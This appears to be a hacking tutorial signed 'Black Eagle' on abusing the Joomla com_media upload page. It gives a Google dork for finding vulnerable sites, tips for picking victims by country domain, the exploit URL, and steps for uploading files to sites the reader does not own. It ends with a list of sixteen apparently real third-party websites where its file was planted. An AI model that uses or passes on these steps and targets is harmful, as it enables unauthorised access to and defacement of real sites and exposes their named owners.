Com_media [ CMS Joomla]

Dork :

 inurl:index.php?option=com_media


Exploit :

 /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Steps

1- Open Google

2- Paste the dork. If you want a specific search result, you must add the site domain for your target. For example, if your target is Malaysian site, you must put "site:.my" at the back of your dork.

Example :

inurl:index.php?option=com_media site:.my

inurl:index.php?option=com_media site:.au

3- After that, paste the exploit behind the site address and it will become like this,

http://www.ikmbintulu.edu.my/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

4- You will see something like this,

This means the site is vulnerable

This means the site is not vulnerable

5- Click "Choose File" and choose your .txt / .jpg / .gif file to upload.

6- Click " Start Upload "

7- To view your file, add /images/yourfilename.txt at the back of the site

Example: http://www.ikmbintulu.edu.my/images/bcc.txt

That's All My Tutorial For This Time :D

Live Demo:

http://www.ikmbintulu.edu.my/images/bcc.txt

http://www.ayrshirebridge.co.uk/images/bcc.txt

http://www.cvbhejo.com/images/bcc.txt

http://mobilemusicteacher.com/images/bcc.txt

http://www.adriennejfurness.com/images/bcc.txt

http://www.one-world-volunteer.net/images/bcc.txt

http://www.ablogic.de/images/bcc.txt

http://www.sv-mistelgau.de/images/bcc.txt

http://www.moclinejo.de/images/bcc.txt

http://www.gorillareisen.de/images/bcc.txt

http://www.skylinepark.org/images/bcc.txt

http://arsomsilp.ac.th/health/images/bcc.txt

http://permaculture.com.au/images/bcc.txt

https://www.fabmation.de/images/bcc.txt

http://www.erkner-gruppe.de/images/bcc.txt

http://www.kellerladen-ev.de/images/bcc.txt

By Black Eagle